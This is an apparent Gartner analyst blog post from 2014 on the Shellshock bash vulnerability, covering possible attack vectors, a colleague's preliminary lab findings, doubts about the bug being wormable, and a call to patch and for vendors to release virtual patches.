Sometimes you have a gut feeling. And sometimes you should trust this feeling. I personally believe that this shellshock bug is far more serious than Heartbleed. I say that for a number of reasons. When I first looked at the CVE database entry (cve-2014-6271) I saw that NIST had assigned it a score from 10 out of 10 that is pretty much as serious as it can get but was disclosing only little information that mentions some possible attack vectors such as the OpenSSH sshd and mod_cgi plus some mention of “unspecified DHCP clients” that is not quite understandable to me. Do I need to read this as “caution, although we mention mod_cgi” because it is present on half of the unix systems installed on this planet possible attack vectors could even include the DHCP deamon and a whole lot of stuff that we do not know (yet)”? Well, this is a known unknown to me. And whenever I have not enough information to make a fully qualified judgment this makes me suspicious and calls for some serious action.
OK, down to the facts. What are the known knowns? My colleague Erik Heidt did a deep dive and fiddled around with the bug in his lab. Erik found a few important points ( –until we know more, these are all preliminary by the way) to consider:
1. The shellshock bug allows for command “injection” but does not appear to permit “privilege elevation”.
2. It looks as if it is possible to build an automated exploit that scans for vulnerable systems and uses this to gain remote access. It is however unclear why some sources say that the bug would be “wormable”. “Worm” implies that the remote access is used to turn that target into an attack platform in an automated process. That I doubt.
3. ShellShock’d commands show up in the account history – so unlike Heartbleed there will be clues regarding the exploitation. Shure, you can erase the history – but my point is that if you can reproduce user events you can reproduce these events. (And then there are these core dumps…
Permitting remote execution of commands from a web interface is a dangerous business, and it is unlikely that those systems are ‘secure’ – in the sense that there are so many vulnerabilities that have to be addressed when you permit remote command execution that this is just the cherry on top of the attack Sunday.
The reason that I am not too worried about this from the “worm” perspective is that this is an amateurish way to create an application, and as a result each of these ‘exploits’ is going to require an exploration phase to the attack where the attacker figures out what access and capabilities the remote account has.
For web applications specifically it is unlikely to be present in important application (i.e. online banking, commercial solutions, etc.) but much more likely in the forgotten about one-off fix! The code that was ‘fast tracked’ to address an ‘urgent client or sales need’ and then forgot about – that is where folks are going to get hammered with this. But, I would argue that if they were coding a web application this way – they asked for it. Again, securing code that is written like this – that jus triggers direct OS calls with no input validation & in a mono-tier application is begging for exploit.
What else do we observe? AWS has scheduled a massive maintenance reboot that by coincidence comes round about the same time than the shellshock bug. Did someone maybe find a way to shock a hypervisor? Until 1 OCT this information is embargoed and later this year we will all know.
In the light that we do not currently have enough information at hand to make a qualified judgment, you should probably assume that attack vectors can potentially reach down to the DHCP daemon and also use for example routing daemons and VPN software. But what should you do?
Patching and hardening remain essential for all servers. Patch management is the single most appropriate safeguard for any category of server. The majority of safeguards are compensating controls to prevent the exploitation of software deficiencies that eventually can only be resolved through server patching. Right. But what, as some sources state, if the patch only helps partially? Well, then you have at least a partial mitigation of your headache and you join the next round (of patching) when it becomes available. Best in class companies have started to patch their systems, and so should you! In my opinion this would now be the big hour of the endpoint security and Network Intrusion Prevention System (NIPS) vendors that provide “virtual patching” capabilities. “Virtual patches” are enforced via endpoint agent software or NIPS appliances and, if vendors are to be believed, protect your systems from an attack even if no patch has been released yet or if the nature of the system prohibits patching. Until now however they all stayed silent. Guys, your historical hour (at least in the last decade) is now! Where are your virtual patches?!?!
Read Complimentary Relevant Research
Predicts 2017: Artificial Intelligence
Artificial intelligence is changing the way in which organizations innovate and communicate their processes, products and services. Practical...
View Relevant Webinars
The BI & Analytics Challenge for T&SPs: Major Disruptions on the Way
From artificial intelligence (AI) to machine learning to smart data discovery, the BI market is once again going through a major transformation...
Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.